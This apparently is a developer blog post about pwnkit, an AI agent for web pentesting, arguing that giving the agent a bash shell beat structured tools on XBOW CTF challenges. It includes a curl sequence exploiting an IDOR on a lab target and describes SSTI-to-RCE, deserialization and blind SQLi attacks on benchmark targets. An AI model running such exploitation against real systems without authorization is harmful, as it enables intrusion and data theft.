why we gave our agent a terminal instead of tools
we built 10 structured tools for web pentesting. then we gave the agent just curl and it outperformed everything.
two weeks went into building structured tools for web pentesting. crawl_page, submit_form, http_request, extract_links — typed parameters, validated inputs, clean JSON responses. the kind of tooling that looks great in a design doc.
then the agent flailed with them for 20+ turns trying to chain a login flow into an IDOR exploit. it never got the flag. swap in a bash shell and the agent extracted the flag in ten turns, first try.
this is the story of how shell-first beat structured tools for AI pentesting — and why pwnkit is built around that idea now.
the structured tools
the original tool set was what you’d expect from a web pentesting framework. each tool did one thing with typed params:
// crawl a page, get back structured links + forms
crawl_page({ url: "http://target/login", depth: 1 })
// submit a form with named fields
submit_form({ url: "http://target/login", method: "POST",
fields: { username: "admin", password: "password" } })
// make an arbitrary HTTP request
http_request({ url: "http://target/api/users/2",
method: "GET", headers: { "Cookie": "session=abc123" } })
clean abstractions. good DX. pentesting isn’t a clean abstraction.
the agent needed to log in, capture a session cookie, use that cookie to access another user’s endpoint, and extract a flag from the response. four steps. but with structured tools, each step was its own tool call with its own parameters, and the agent had to manually thread state between them. which cookie came back from the login? what format is it in? does it go in a header or does the tool handle it?
it kept getting confused. it would call submit_form for the login, get back a response with Set-Cookie in the headers, then call http_request with the wrong cookie format. or forget the cookie entirely. or try to call crawl_page on the API endpoint and get back HTML parsing errors because the response was JSON.
twenty turns in, it was still looping. the context window was filling with failed attempts and the agent was losing track of what it had already tried.
the experiment
three tools total:
shell_exec— run any bash command, get stdout/stderr backsave_finding— record a confirmed vulnerabilitydone— signal completion
no crawling abstraction. no form submission helper. no HTTP client wrapper. just a shell.
# what the agent actually did (10 turns)
# 1. login and capture cookies
curl -c cookies.txt -d "username=admin&password=password" http://target/login
# 2. check what we got
cat cookies.txt
# 3. use the session to hit another user's profile
curl -b cookies.txt http://target/api/users/2
# 4. flag was right there in the response
# {"id": 2, "name": "victim", "secret": "FLAG{idor_confirmed}"}
ten turns. the agent logged in, captured cookies to a jar, made an authenticated request to another user’s endpoint, found the IDOR, and extracted the flag. no confusion about cookie formats. no state threading between tool calls. just curl doing what curl does.
why this works
three reasons, none of them obvious until you watch it happen.
the model already knows curl. every language model has seen millions of curl examples in its training data. it knows -c saves cookies and -b sends them. it knows -L follows redirects. it knows how to pipe output through jq or grep. a structured tool like http_request requires learning a specific API. curl is an API the model already knows. zero ramp-up.
one tool means zero cognitive overhead. with ten tools, the agent burns tokens deciding which tool to use. should it crawl_page or http_request? is this a form submission or a raw POST? with one tool, there’s no decision. every action is shell_exec. the reasoning budget goes into the actual pentesting problem instead of tool selection.
bash is composable in ways structured tools aren’t. a single curl command can follow redirects, save cookies, send custom headers, post multipart data, and pipe the response through jq — all in one invocation. with structured tools, that’s five separate tool calls with state threaded between them. the shell gives you pipes, redirects, variables, loops, and the entire unix toolkit for free. curl | grep | awk in one command versus three tool calls with intermediate parsing.
the data
the shell-first approach was tested against 10 challenges from the XBOW benchmark — Docker-based CTFs covering traditional web vulnerabilities. same model, no benchmark-specific tuning.
2 challenges (Melodic Mayhem, GraphQL) hit Azure timeouts
the deserialization challenge was the surprise. four turns. the agent generated a serialized payload with python, piped it through base64, and sent it via curl in a single command. with structured tools, this would have needed a separate tool just to encode the payload, then another to send it, and the model kept getting the encoding wrong across tool boundaries.
the SSTI challenge was five turns because the agent’s first payload ({{7*7}}) confirmed the template injection, and then it escalated directly to RCE with a well-known Jinja2 payload. one curl per step. no friction.
the blind SQLi is the retry story worth telling. with a 15-turn budget, the agent couldn’t crack it — time-based blind extraction is slow and the agent ran out of room. bumping the budget to 25 turns produced a flag in 20. the lesson: some challenges need more context window, not better tools. shell-first was correct, it just needed more runway.
how we compare
| tool | XBOW score | approach |
|---|---|---|
| KinoSec | 92.3% | black-box, template-driven + AI |
| XBOW (their own agent) | 85% | purpose-built for their benchmark |
| MAPTA | 76.9% | multi-agent pentesting |
| pwnkit | 70% | shell-first, no structured tools |
70% with just a bash shell and an LLM lands in the same ballpark as dedicated web pentesting tools. the gap to KinoSec is real — they have template libraries and years of web-specific tuning — but the shell-first approach scales without that infrastructure.
prior art
this isn’t a new idea. it just got rediscovered the hard way.
pi-mono’s work on bash-as-universal-tool was a major influence. the thesis is simple: bash is the Swiss army knife that every model already knows. there’s no point building a hundred specialized tools when one general-purpose tool covers all of them.
Terminus took this further with their single-tmux-tool approach — give the agent a persistent terminal session and let it drive. no tool sprawl, no state management, no abstraction mismatches.
XBOW and KinoSec research on autonomous pentesting agents showed that the best-performing agents were the ones with the fewest, most general tools. the more specialized the toolkit, the more the agent struggled with tool selection and state threading.
what this means for pwnkit
pwnkit is now shell-first. the agent gets a sandboxed bash environment with full access to curl, python, nmap, sqlmap, and whatever else is installed. structured tools like crawl_page and submit_form still exist, but they’re optional — available if a specific workflow benefits from them, not required for the core loop.
the mental model changed. the agent isn’t a user clicking through a GUI with carefully designed buttons. it’s a pentester sitting in front of a terminal. it thinks in commands, not in tool calls. that maps much more naturally to how actual pentesting works.
# pwnkit's core tool loop
shell_exec → observe output → reason → shell_exec → ...
↓
save_finding (when confirmed)
↓
done (when complete)
the tradeoff
this isn’t free. two real costs.
more tokens. curl returns raw HTTP responses. headers, HTML, JSON — all of it lands in the context window. structured tools could parse and summarize, returning only the relevant data. with shell-first, the agent sees everything, which means bigger contexts and more token spend. output truncation and instructions to pipe through head or jq mitigate this, but it’s still more expensive than structured tools on a per-turn basis.
sandboxing is mandatory. giving an AI agent arbitrary shell access is exactly as dangerous as it sounds. pwnkit runs everything in isolated containers with no network access except to the target. no filesystem persistence between runs. no access to the host. this isn’t optional — it was the first thing built before the agent ran a single command. for anyone building something similar: sandbox first, agent second. always.
the flexibility gain is worth the cost. the agent can use any tool that exists on the system — not just the ones anticipated and wrapped in advance. when a new challenge requires sqlmap or ffuf or a custom python script, the agent just uses it. no new tool implementation. no SDK update. just shell_exec.
the lesson
the original plan was to build the best structured tool set for AI pentesting. there was a roadmap. there were typed schemas. there were tests.
then the benchmark ran and the dumb approach won. not by a little — the structured tools couldn’t even complete the challenges the shell knocked out in under a dozen turns.
sometimes the right architecture isn’t the one you designed. it’s the one that emerges when you finally measure what works.